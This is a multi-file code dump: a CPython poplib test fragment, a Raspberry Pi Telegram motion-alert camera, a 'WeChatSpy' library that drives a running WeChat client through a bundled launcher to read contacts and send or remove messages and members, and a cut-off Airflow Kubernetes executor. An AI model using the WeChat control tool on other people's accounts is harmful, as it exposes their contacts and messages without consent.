self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(pop.sock.gettimeout() is None)
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts]
if SUPPORTS_SSL:
tests.append(TestPOP3_SSLClass)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
pi_surveillance.py
|
import RPi.GPIO as GPIO
import os
import threading
import emoji
import json
import dropbox
from telegram.ext import CommandHandler, Updater, MessageHandler, Filters
import time
import datetime
import argparse
import warnings
from pyimagetemp.tempimage import TempImage
from picamera.array import PiRGBArray
from picamera import PiCamera
import imutils
import cv2
cmd_ls = "1) /start "+emoji.emojize(':key:')+": Nothing, just a Hi.\n 2) /help "+emoji.emojize(':warning:')+": List of available command(s)\n 3) /subscribe "+emoji.emojize(':memo:')+": Subscribe to motion alerts.\n 4) /unsubscribe "+emoji.emojize(':electric_plug:')+": Unsubscribe to motion alerts.\n 5) /update "+emoji.emojize(':bell:')+": Toggle image feed alert\n 6) /alarm :Enable/disable alarm"
alarm_status = None
update_status = False
# construct arg parser
ap = argparse.ArgumentParser()
ap.add_argument("-c", "--conf", required=True,
help="path to JSON configuration file")
ap.add_argument("-s", "--subs", required=True,
help="path to JSON subscriber list file")
args = vars(ap.parse_args())
# filter warning and load config
warnings.filterwarnings("ignore")
conf = json.load(open(args["conf"]))
client = Updater(token=conf["telegram_access_token"], use_context=True)
db_client = None
# check to see if the Dropbox should be used
if conf["use_dropbox"]:
# connect to dropbox and start the session authorization process
db_client = dropbox.Dropbox(conf["dropbox_access_token"])
print("[SUCCESS] dropbox account linked")
# init the GPIO
try:
GPIO.setmode(GPIO.BCM)
RELAY_1_GPIO = conf["relay-0"]
GPIO.setup(RELAY_1_GPIO, GPIO.OUT) # Assign Mode
GPIO.output(RELAY_1_GPIO, GPIO.LOW)
alarm_status = False
except:
print("GPIO init failed.")
def start(update, context):
context.bot.send_message(chat_id= update.effective_chat.id,
text="Hi, Welcome to Surveillance Alert Bot! /help for help or /subscribe and /update to begin receiving new feed. (Your ID is: {})".format(update.effective_user.id))
def unknown(update, context):
context.bot.send_message(chat_id= update.effective_chat.id,
text="Sorry, I didn't understand that. / Saya tidak faham")
def restart(update, context):
auth_id = update.effective_user.id
if conf["reboot_access_token"] == auth_id:
print("[WARN] Attempting to reboot!...")
context.bot.send_message(chat_id = update.effective_chat.id,
text="[NOTICE] Rebooting my core system... See you later!")
time.sleep(3)
threading.Thread(target=shutdown).start()
else:
print("[WARN] Unauthorize request!")
context.bot.send_message(chat_id = update.effective_chat.id,
text="[???] How did you know about this command?")
def shutdown():
try:
client.stop()
client.is_idle = False
os.system('sudo shutdown -r now')
except:
print("Something not right when attempting to reboot.")
def help(update, context):
auth_id = update.effective_user.id
context.bot.send_message(chat_id= update.effective_chat.id,
text="Available Commands:\n{}".format(cmd_ls))
if conf["reboot_access_token"] == auth_id:
context.bot.send_message(chat_id= update.effective_chat.id,
text="[PRIVATE] /restart: To reboot bot and its core systems")
def alarm(update, context):
global alarm_status
# check alarm status, if enabled, disabled it and vice versa
if alarm_status:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Alarm has been turned off. /alarm to re-enable.")
GPIO.output(RELAY_1_GPIO,GPIO.HIGH)
alarm_status= False
print("[CONF] Alarm disabled.")
else:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Triggering alarm... /alarm to disable.")
alarm_status= True
GPIO.output(RELAY_1_GPIO,GPIO.LOW)
print("[CONF] Alarm enabled.")
def update(update, context):
global update_status
# check if update is enable/disable
if update_status:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Update has been disabled! /update to keep receiving new feed.")
update_status=False
print("[CONF] Update disabled.")
else:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Update has been enabled! /update to stop any new feed.")
update_status=True
print("[CONF] Update enabled.")
def subscribe(update, context):
# check if user id exist
user_id = update.effective_user.id
exist = False
present = False
with open(args["subs"],'r') as f:
subs = json.load(f)
print("[INFO] Current subs - {}".format(subs))
if "subscribers" in subs:
exist = True
for s in subs["subscribers"]:
if user_id in s.values():
context.bot.send_message(chat_id= update.effective_chat.id,
text="You already subscribed! /unsubscribe to stop")
present = True
break
if not exist:
subs = {}
subs['subscribers'] = []
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
if not present:
name = update.effective_user.first_name
subs['subscribers'].append({"user_name": name, "user_id": user_id})
print("[INFO] Subscribing with data: name={}, user_data={}".format(name, user_id))
print("[INFO] New subscribers list: {}".format(subs))
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
context.bot.send_message(chat_id= update.effective_chat.id,
text="You have been subscribed to new alerts!".format(update.effective_user.id))
def unsubscribe(update, context):
user_id = update.effective_user.id
exist=False
status=False
entry_key=-1
sel = 0
with open(args["subs"], 'r') as f:
subs = json.load(f)
if 'subscribers' in subs:
exist=True
for entry in subs['subscribers']:
if entry['user_id'] == 'id':
pass
elif entry['user_id'] == user_id:
status=True
entry_key = sel
name = entry['user_name']
id = entry['user_id']
print("[INFO] user_id found with name: {} at entry {}.".format(name,sel))
sel=sel+1
if not status:
context.bot.send_message(chat_id= update.effective_chat.id,
text="You did not subscribed to any alerts. /subscribe")
if not exist:
subs = {}
subs['subscribers']= []
subs['subscribers'].append({"user_name": "user_id"})
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
if status:
subs['subscribers'].pop(entry_key)
print("[INFO] Removed subscriber {} with id {}".format(name, id))
print("[INFO] Updated subscriber list: {}".format(subs))
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
context.bot.send_message(chat_id= update.effective_chat.id,
text="You have been unsubscribed. /subscribe")
def update_to_user(chatid, img):
client.bot.send_message(chat_id= chatid,
text="Alert! Movement detected!! Sending image feed(s)... [/alarm]")
client.bot.send_photo(chat_id= chatid, photo=open(img,'rb'))
def main():
# load telegram client
dispatcher = client.dispatcher
unknown_handler = MessageHandler(Filters.command, unknown)
start_handler = CommandHandler('start', start)
subscribe_handler = CommandHandler('subscribe', subscribe)
unsubscribe_handler = CommandHandler('unsubscribe', unsubscribe)
restart_handler = CommandHandler('restart', restart)
help_handler = CommandHandler('help', help)
update_handler = CommandHandler('update',update)
alarm_handler = CommandHandler('alarm', alarm)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(restart_handler)
dispatcher.add_handler(help_handler)
dispatcher.add_handler(update_handler)
dispatcher.add_handler(subscribe_handler)
dispatcher.add_handler(unsubscribe_handler)
dispatcher.add_handler(alarm_handler)
dispatcher.add_handler(unknown_handler)
print("[Notice] Bot is now online")
with open(args['subs'],'r') as f:
subs = json.load(f)
try:
if "subscribers" in subs:
for key in subs['subscribers']:
if key['user_name'] == 'name':
pass
else:
client.bot.send_message(chat_id=key['user_id'],
text="[Notice] Surveillance bot is now online!")
except:
print("[WARN] Subscriber {} may/had blocked the bot. Update the subscriber list!".format(key['user_name']))
client.start_polling()
th = threading.Thread(target=main, args=(), daemon=True)
th.start()
# openCV for pi_surveillance
# init the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = tuple(conf["resolution"])
camera.framerate = conf["fps"]
rawCapture = PiRGBArray(camera, size=tuple(conf["resolution"]))
# allow the camera to warm up, then init the average frame, last
# uploaded timestamp, and frame motion counter
print("[INFO] Warming up...")
time.sleep(conf["camera_warmup_time"])
avg = None
lastUploaded = datetime.datetime.now()
motionCounter = 0
# capture frames from the camera
for f in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image and init
# the timestamp and occupied/unoccupied text
frame = f.array
timestamp = datetime.datetime.now()
text = "Unoccupied"
# resize the frame, convert it to grayscale, and blur it
frame = imutils.resize(frame, width=500)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21, 21), 0)
# if the average frame is none, init it
if avg is None:
print("[INFO] starting background model...")
avg = gray.copy().astype("float")
rawCapture.truncate(0)
continue
# accumulate the weighted average between the current frame and
# previous frames, then compute the differences between the current
# frame and running average
cv2.accumulateWeighted(gray, avg, 0.5)
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(avg))
# threshold the delta image, dilate the thresholded image to fill
# in the holes then find contours on thresholded image
thresh = cv2.threshold(frameDelta, conf["delta_thresh"], 255,
cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh,None, iterations=2)
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# loop over contours
for c in cnts:
# if the contour is too small, ignore
if cv2.contourArea(c) < conf["min_area"]:
continue
# compute the bounding box for the contour, draw it on the
# frame, and then update the text
(x, y, w, h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
text = "Occupied"
# draw the text and timestamp on the frame
ts = timestamp.strftime("%A %d %B %Y %I:%M:%S%p")
cv2.putText(frame, "Status: {}".format(text), (10,20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
cv2.putText(frame, ts, (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# check to see if the room is occupied
if text == "Occupied":
# check to see if enough time has passed between uploads
if (timestamp - lastUploaded).seconds >= conf["min_upload_seconds"]:
# increment the motion counter
motionCounter +=1
# check to see if the number of frames with consistent motion
# is high enough
if motionCounter >= conf["min_motion_frames"]:
# check to see if telegram should be used
if update_status:
with open(args['subs'],'r') as f:
subs = json.load(f)
if "subscribers" in subs:
t = TempImage()
cv2.imwrite(t.path, frame)
for key in subs['subscribers']:
try:
if key['user_name'] == 'name':
pass
else:
update_to_user(key['user_id'],t.path)
print("[UPDATING] Uploading to {}".format(key['user_name']))
except:
print("[WARN] Subscriber {} may/had blocked the bot. Update the subscriber list!".format(key['user_name']))
t.cleanup()
if conf["use_dropbox"]:
# write the image to temporary file
t = TempImage()
cv2.imwrite(t.path, frame)
# upload the image to Dropbox and cleanup the tempory image
print("[UPLOAD] {}".format(ts))
path = "/{base_path}/{timestamp}.jpg".format(
base_path=conf["dropbox_base_path"], timestamp=ts)
db_client.files_upload(open(t.path, "rb").read(), path)
t.cleanup()
# update the last uploaded timestamp
# and reset motion counter
lastUploaded = timestamp
motionCounter = 0
# otherwise, the room is not occcupied
else:
motionCounter = 0
# check to see if the frames should be displayed to screen
if conf["show_video"]:
# display the video feed
cv2.imshow("Security Feed", frame)
key = cv2.waitKey(1) & 0xFF
# if the 'q' key is pressed, break from the loop
if key == ord("q"):
print("[EXITING] Terminating other process...")
break
# clear the stream in prepration for the next frame
rawCapture.truncate(0)
|
spy.py
|
from ast import literal_eval
import json
import os
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from time import sleep
from subprocess import Popen, PIPE
from .exceptions import handle_error_code
import logging
import warnings
import re
pattern = '[\u4e00-\u9fa5]'
formatter = logging.Formatter('%(asctime)s [%(threadName)s] %(levelname)s: %(message)s')
sh = logging.StreamHandler()
sh.setFormatter(formatter)
sh.setLevel(logging.DEBUG)
class WeChatSpy:
def __init__(self, parser=None, error_handle=None, multi=False, key=None):
self.logger = logging.getLogger(__file__)
self.logger.addHandler(sh)
self.logger.setLevel(logging.DEBUG)
# TODO: 异常处理函数
self.__error_handle = error_handle
# 是否多开微信PC客户端
self.__multi = multi
# 商用key
self.__key = key
# socket数据处理函数
self.__parser = parser
self.__pid2client = {}
self.__socket_server = socket(AF_INET, SOCK_STREAM)
self.__socket_server.bind(("127.0.0.1", 9527))
self.__socket_server.listen(1)
t_start_server = Thread(target=self.__start_server)
t_start_server.daemon = True
t_start_server.name = "socket accept"
t_start_server.start()
def add_log_output_file(self, filename="spy.log", mode='a', encoding="utf8", delay=False, level="WARNING"):
fh = logging.FileHandler(filename, mode=mode, encoding=encoding, delay=delay)
if level.upper() == "DEBUG":
fh.setLevel(logging.DEBUG)
elif level.upper() == "INFO":
fh.setLevel(logging.INFO)
elif level.upper() == "WARNING":
fh.setLevel(logging.WARNING)
elif level.upper() == "ERROR":
fh.setLevel(logging.ERROR)
fh.setFormatter(formatter)
self.logger.addHandler(fh)
def __start_server(self):
while True:
socket_client, client_address = self.__socket_server.accept()
if self.__key:
data = json.dumps({"code": 9527, "key": self.__key})
data_length_bytes = int.to_bytes(len(data.encode(encoding="utf8")), length=4, byteorder="little")
socket_client.send(data_length_bytes + data.encode(encoding="utf8"))
t_socket_client_receive = Thread(target=self.receive, args=(socket_client, ))
t_socket_client_receive.name = f"client {client_address[1]}"
t_socket_client_receive.daemon = True
t_socket_client_receive.start()
def receive(self, socket_client):
data_str = ""
_data_str = None
while True:
try:
_data_str = socket_client.recv(4096).decode(encoding="utf8", errors="ignore")
except Exception as e:
for pid, client in self.__pid2client.items():
if client == socket_client:
self.__pid2client.pop(pid)
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
else:
pid = "unknown"
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
if _data_str:
data_str += _data_str
if data_str and data_str.endswith("*393545857*"):
for data in data_str.split("*393545857*"):
if data:
data = literal_eval(data)
if not self.__pid2client.get(data["pid"]) and data["type"] == 200:
self.__pid2client[data["pid"]] = socket_client
self.logger.info(f"A WeChat process (PID:{data['pid']}) successfully connected")
if callable(self.__parser):
self.__parser(data)
data_str = ""
def __send(self, data, pid):
if pid:
socket_client = self.__pid2client.get(pid)
else:
socket_client_list = list(self.__pid2client.values())
socket_client = socket_client_list[0] if socket_client_list else None
if socket_client:
data = json.dumps(data)
data_length_bytes = int.to_bytes(len(data.encode(encoding="utf8")), length=4, byteorder="little")
try:
socket_client.send(data_length_bytes + data.encode(encoding="utf8"))
except Exception as e:
for pid, v in self.__pid2client.items():
if v == socket_client:
self.__pid2client.pop(pid)
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
else:
pid = "unknown"
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
def run(self, background=False):
current_path = os.path.split(os.path.abspath(__file__))[0]
launcher_path = os.path.join(current_path, "Launcher.exe")
cmd_str = f"{launcher_path} multi" if self.__multi else launcher_path
p = Popen(cmd_str, shell=True, stdout=PIPE)
res_code, err = p.communicate()
res_code = res_code.decode()
handle_error_code(res_code)
if not background:
while True:
sleep(86400)
def query_contact_details(self, wxid, chatroom_wxid="", pid=None):
"""
查询联系人详情
:param wxid: 联系人wxid
:param chatroom_wxid:
:param pid:
"""
data = {"code": 2, "wxid": wxid, "chatroom_wxid": chatroom_wxid}
self.__send(data, pid)
def query_contact_list(self, step=50, pid=None):
"""
查询联系人详情
:param step: 每次回调的联系人列表长度
:param pid:
:return:
"""
data = {"code": 3, "step": step}
self.__send(data, pid)
def query_chatroom_member(self, wxid, pid=None):
"""
查询群成员列表
:param wxid: 群wxid
:param pid:
:return:
"""
data = {"code": 4, "wxid": wxid}
self.__send(data, pid)
def send_text(self, wxid, content, at_wxid="", pid=None):
"""
发送文本消息
:param wxid: 文本消息接收wxid
:param content: 文本消息内容
:param at_wxid: 如果wxid为群wxid且需要@群成员 此参数为被@群成员wxid,以英文逗号分隔
:param pid:
"""
if not wxid.endswith("chatroom"):
at_wxid = ""
data = {"code": 5, "wxid": wxid, "at_wxid": at_wxid, "content": content}
self.__send(data, pid)
def send_image(self, wxid, image_path, pid=None):
warnings.warn("The function 'send_image' is deprecated, and has been replaced by the function 'send_file'",
DeprecationWarning)
self.send_file(wxid, image_path, pid)
def send_file(self, wxid, file_path, pid=None):
"""
发送文件消息
:param wxid: 文件消息接收wxid
:param file_path: 文件路径
:param pid:
"""
if len(file_path.split("\\")) > 8:
return self.logger.warning(f"File path is too long: {file_path}")
if re.findall(pattern, file_path):
return self.logger.warning(f"Chinese characters are not allowed in file path: {file_path}")
data = {"code": 6, "wxid": wxid, "file_path": file_path}
self.__send(data, pid)
def accept_new_contact(self, encryptusername, ticket, pid=None):
"""
接受好友请求
:param encryptusername:
:param ticket:
:param pid:
:return:
"""
data = {"code": 7, "encryptusername": encryptusername, "ticket": ticket}
self.__send(data, pid)
def send_announcement(self, wxid, content, pid=None):
"""
发送群公共
:param wxid: 群wxid
:param content: 公告内容
:param pid:
:return:
"""
if not wxid.endswith("chatroom"):
return self.logger.warning("Can only send announcements to chatrooms")
data = {"code": 8, "wxid": wxid, "content": content}
self.__send(data, pid)
def create_chatroom(self, wxid, pid=None):
"""
创建群聊
:param wxid: wxid,以","分隔 至少需要两个
:param pid:
:return:
"""
if len(wxid.split(",")) < 2:
return self.logger.warning("This function requires at least two wxids separated by ','")
data = {"code": 9, "wxid": wxid}
self.__send(data, pid)
def share_chatroom(self, chatroom_wxid, wxid, pid=None):
"""
分享群聊邀请链接
:param chatroom_wxid:
:param wxid:
:param pid:
:return:
"""
data = {"code": 10, "wxid": wxid, "chatroom_wxid": chatroom_wxid}
self.__send(data, pid)
def remove_chatroom_member(self, chatroom_wxid, wxid, pid=None):
"""
移除群成员
:param chatroom_wxid:
:param wxid:
:param pid:
:return:
"""
data = {"code": 11, "wxid": wxid, "chatroom_wxid": chatroom_wxid}
self.__send(data, pid)
def remove_contact(self, wxid, pid=None):
"""
移除联系人
:param wxid:
:param pid:
:return:
"""
data = {"code": 12, "wxid": wxid}
self.__send(data, pid)
def add_contact_from_chatroom(self, chatroom_wxid, wxid, msg, pid=None):
"""
将群成员添加为好友
:param chatroom_wxid: 群wxid
:param wxid: 群成员wxid
:param msg: 好友申请信息
:param pid:
:return:
"""
data = {"code": 13, "wxid": wxid, "chatroom_wxid": chatroom_wxid, "msg": msg}
self.__send(data, pid)
def add_unidirectional_contact_a(self, wxid, msg, pid=None):
"""
添加单向好友(自己被对方删除)
:param wxid:
:param msg: 好友申请信息
:param pid:
:return:
"""
data = {"code": 14, "wxid": wxid, "msg": msg}
self.__send(data, pid)
def add_unidirectional_contact_b(self, wxid, pid=None):
"""
添加单向好友(对方被自己删除)
:param wxid:
:param pid:
:return:
"""
data = {"code": 15, "wxid": wxid}
self.__send(data, pid)
|
kubernetes_executor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
KubernetesExecutor
.. seealso::
For more information on how the KubernetesExecutor works, take a look at the guide:
:ref:`executor:KubernetesExecutor`
"""
import base64
import functools
import json
import multiprocessing
import time
from queue import Empty, Queue # pylint: disable=unused-import
from typing import Any, Dict, Optional, Tuple, Union
import kubernetes
from dateutil import parser
from kubernetes import client, watch
from kubernetes.client import Configuration
from kubernetes.client.rest import ApiException
from urllib3.exceptions import ReadTimeoutError
from airflow import settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.base_executor import NOT_STARTED_MESSAGE, BaseExecutor, CommandType
from airflow.kubernetes import pod_generator
from airflow.kubernetes.kube_client import get_kube_client
from airflow.kubernetes.pod_generator import MAX_POD_ID_LEN, PodGenerator
from airflow.kubernetes.pod_launcher import PodLauncher
from airflow.models import KubeResourceVersion, KubeWorkerIdentifier, TaskInstance
from airflow.models.taskinstance import TaskInstanceKey
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
# TaskInstance key, command, configuration
KubernetesJobType = Tuple[TaskInstanceKey, CommandType, Any]
# key, state, pod_id, namespace, resource_version
KubernetesResultsType = Tuple[TaskInstanceKey, Optional[str], str, str, str]
# pod_id, namespace, state, annotations, resource_version
KubernetesWatchType = Tuple[str, str, Optional[str], Dict[str, str], str]
class KubeConfig: # pylint: disable=too-many-instance-attributes
"""Configuration for Kubernetes"""
core_section = 'core'
kubernetes_section = 'kubernetes'
logging_section = 'logging'
def __init__(self): # pylint: disable=too-many-statements
configuration_dict = conf.as_dict(display_sensitive=True)
self.core_configuration = configuration_dict['core']
self.airflow_home = settings.AIRFLOW_HOME
self.dags_folder = conf.get(self.core_section, 'dags_folder')
self.parallelism = conf.getint(self.core_section, 'parallelism')
self.pod_template_file = conf.get(self.kubernetes_section, 'pod_template_file',
fallback=None)
self.delete_worker_pods = conf.getboolean(
self.kubernetes_section, 'delete_worker_pods')
self.delete_worker_pods_on_failure = conf.getboolean(
self.kubernetes_section, 'delete_worker_pods_on_failure')
self.worker_pods_creation_batch_size = conf.getint(
self.kubernetes_section, 'worker_pods_creation_batch_size')
self.worker_container_repository = conf.get(
self.kubernetes_section, 'worker_container_repository')
self.worker_container_tag = conf.get(
self.kubernetes_section, 'worker_container_tag')
self.kube_image = f'{self.worker_container_repository}:{self.worker_container_tag}'
# The Kubernetes Namespace in which the Scheduler and Webserver reside. Note
# that if your
# cluster has RBAC enabled, your scheduler may need service account permissions to
# create, watch, get, and delete pods in this namespace.
self.kube_namespace = conf.get(self.kubernetes_section, 'namespace')
self.multi_namespace_mode = conf.getboolean(self.kubernetes_section, 'multi_namespace_mode')
# The Kubernetes Namespace in which pods will be created by the executor. Note
# that if your
# cluster has RBAC enabled, your workers may need service account permissions to
# interact with cluster components.
self.executor_namespace = conf.get(self.kubernetes_section, 'namespace')
kube_client_request_args = conf.get(self.kubernetes_section, 'kube_client_request_args')
if kube_client_request_args:
self.kube_client_request_args = json.loads(kube_client_request_args)
if self.kube_client_request_args['_request_timeout'] and \
isinstance(self.kube_client_request_args['_request_timeout'], list):
self.kube_client_request_args['_request_timeout'] = \
tuple(self.kube_client_request_args['_request_timeout'])
else:
self.kube_client_request_args = {}
delete_option_kwargs = conf.get(self.kubernetes_section, 'delete_option_kwargs')
if delete_option_kwargs:
self.delete_option_kwargs = json.loads(delete_option_kwargs)
else:
self.delete_option_kwargs = {}
# pod security context items should return integers
# and only return a blank string if contexts are not set.
def _get_security_context_val(self, scontext: str) -> Union[str, int]:
val = conf.get(self.kubernetes_section, scontext)
if not val:
return ""
else:
return int(val)
class KubernetesJobWatcher(LoggingMixin):
"""Watches for Kubernetes jobs"""
def __init__(self,
namespace: Optional[str],
multi_namespace_mode: bool,
watcher_queue: 'Queue[KubernetesWatchType]',
resource_version: Optional[str],
worker_uuid: Optional[str],
kube_config: Configuration):
super().__init__()
self.namespace = namespace
self.multi_namespace_mode = multi_namespace_mode
self.worker_uuid = worker_uuid
self.watcher_queue = watcher_queue
self.resource_version = resource_version
self.kube_config = kube_config
self.watcher_process = multiprocessing.Process(target=self.run, args=())
def start(self):
"""
Start the watcher process
"""
self.watcher_process.start()
def is_alive(self):
"""
Check if the watcher process is alive
"""
self.watcher_process.is_alive()
def join(self):
"""
Join watcher process
"""
self.watcher_process.join()
def terminate(self):
"""
Terminate watcher process
"""
self.watcher_process.terminate()
def run(self) -> None:
"""Performs watching"""
kube_client: client.CoreV1Api = get_kube_client()
if not self.worker_uuid:
raise AirflowException(NOT_STARTED_MESSAGE)
while True:
try:
self.resource_version = self._run(kube_client, self.resource_version,
self.worker_uuid, self.kube_config)
except ReadTimeoutError:
self.log.warning("There was a timeout error accessing the Kube API. "
"Retrying request.", exc_info=True)
time.sleep(1)
except Exception:
self.log.exception('Unknown error in KubernetesJobWatcher. Failing')
raise
else:
self.log.warning('Watch died gracefully, starting back up with: '
'last resource_version: %s', self.resource_version)
def _run(self,
kube_client: client.CoreV1Api,
resource_version: Optional[str],
worker_uuid: str,
kube_config: Any) -> Optional[str]:
self.log.info(
'Event: and now my watch begins starting at resource_version: %s',
resource_version
)
watcher = watch.Watch()
kwargs = {'label_selector': 'airflow-worker={}'.format(worker_uuid)}
if resource_version:
kwargs['resource_version'] = resource_version
if kube_config.kube_client_request_args:
for key, value in kube_config.kube_client_request_args.items():
kwargs[key] = value
last_resource_version: Optional[str] = None
if self.multi_namespace_mode:
list_worker_pods = functools.partial(watcher.stream,
kube_client.list_pod_for_all_namespaces,
**kwargs)
else:
list_worker_pods = functools.partial(watcher.stream,
kube_client.list_namespaced_pod,
self.namespace,
**kwargs)
for event in list_worker_pods():
task = event['object']
self.log.info(
'Event: %s had an event of type %s',
task.metadata.name, event['type']
)
if event['type'] == 'ERROR':
return self.process_error(event)
annotations = task.metadata.annotations
task_instance_related_annotations = {
'dag_id': annotations['dag_id'],
'task_id': annotations['task_id'],
'execution_date': annotations['execution_date'],
'try_number': annotations['try_number'],
}
self.process_status(
pod_id=task.metadata.name,
namespace=task.metadata.namespace,
status=task.status.phase,
annotations=task_instance_related_annotations,
resource_version=task.metadata.resource_version,
event=event,
)
last_resource_version = task.metadata.resource_version
return last_resource_version
def process_error(self, event: Any) -> str:
"""Process error response"""
self.log.error(
'Encountered Error response from k8s list namespaced pod stream => %s',
event
)
raw_object = event['raw_object']
if raw_object['code'] == 410:
self.log.info(
'Kubernetes resource version is too old, must reset to 0 => %s',
(raw_object['message'],)
)
# Return resource version 0
return '0'
raise AirflowException(
'Kubernetes failure for %s with code %s and message: %s' %
(raw_object['reason'], raw_object['code'], raw_object['message'])
)
def process_status(self, pod_id: str,
namespace: str,
status: str,
annotations: Dict[str, str],
resource_version: str,
event: Any) -> None:
"""Process status response"""
if status == 'Pending':
if event['type'] == 'DELETED':
self.log.info('Event: Failed to start pod %s, will reschedule', pod_id)
self.watcher_queue.put(
(pod_id, namespace, State.UP_FOR_RESCHEDULE, annotations, resource_version)
)
else:
self.log.info('Event: %s Pending', pod_id)
elif status == 'Failed':
self.log.error('Event: %s Failed', pod_id)
self.watcher_queue.put((pod_id, namespace, State.FAILED, annotations, resource_version))
elif status == 'Succeeded':
self.log.info('Event: %s Succeeded', pod_id)
self.watcher_queue.put((pod_id, namespace, None, annotations, resource_version))
elif status == 'Running':
self.log.info('Event: %s is Running', pod_id)
else:
self.log.warning(
'Event: Invalid state: %s on pod: %s in namespace %s with annotations: %s with '
'resource_version: %s', status, pod_id, namespace, annotations, resource_version
)
class AirflowKubernetesScheduler(LoggingMixin):
"""Airflow Scheduler for Kubernetes"""
def __init__(self,
kube_config: Any,
task_queue: 'Queue[KubernetesJobType]',
result_queue: 'Queue[KubernetesResultsType]',
kube_client: client.CoreV1Api,
worker_uuid: str):
super().__init__()
self.log.debug("Creating Kubernetes executor")
self.kube_config = kube_config
self.task_queue = task_queue
self.result_queue = result_queue
self.namespace = self.kube_config.kube_namespace
self.log.debug("Kubernetes using namespace %s", self.namespace)
self.kube_client = kube_client
self.launcher = PodLauncher(kube_client=self.kube_client)
self._manager = multiprocessing.Manager()
self.watcher_queue = self._manager.Queue()
self.worker_uuid = worker_uuid
self.kube_watcher = self._make_kube_watcher()
def _make_kube_watcher(self) -> KubernetesJobWatcher:
resource_version = KubeResourceVersion.get_current_resource_version()
watcher = KubernetesJobWatcher(watcher_queue=self.watcher_queue,
namespace=self.kube_config.kube_namespace,
multi_namespace_mode=self.kube_config.multi_namespace_mode,
resource_version=resource_version,
worker_uuid=self.worker_uuid,
kube_config=self.kube_config)
watcher.start()
return watcher
def _health_check_kube_watcher(self):
if self.kube_watcher.is_alive():
pass
else:
self.log.error(
'Error while health checking kube watcher process. '
'Process died for unknown reasons')
self.kube_watcher = self._make_kube_watcher()
def run_next(self, next_job: KubernetesJobType) -> None:
"""
The run_next command will check the task_queue for any un-run jobs.
It will then create a unique job-id, launch that job in the cluster,
and store relevant info in the current_jobs map so we can track the job's
status
"""
self.log.info('Kubernetes job is %s', str(next_job))
key, command, kube_executor_config = next_job
dag_id, task_id, execution_date, try_number = key
if command[0:3] != ["airflow", "tasks", "run"]:
raise ValueError('The command must start with ["airflow", "tasks", "run"].')
base_worker_pod = PodGenerator.deserialize_model_file(self.kube_config.pod_template_file)
if not base_worker_pod:
raise AirflowException("could not find a valid worker template yaml at {}"
.format(self.kube_config.pod_template_file))
pod = PodGenerator.construct_pod(
namespace=self.namespace,
worker_uuid=self.worker_uuid,
pod_id=self._create_pod_id(dag_id, task_id),
dag_id=dag_id,
task_id=task_id,
kube_image=self.kube_config.kube_image,
try_number=try_number,
date=execution_date,
command=command,
pod_override_object=kube_executor_config,
base_worker_pod=base_worker_pod
)
# Reconcile the pod generated by the Operator and the Pod
# generated by the .cfg file
self.log.debug("Kubernetes running for command %s", command)
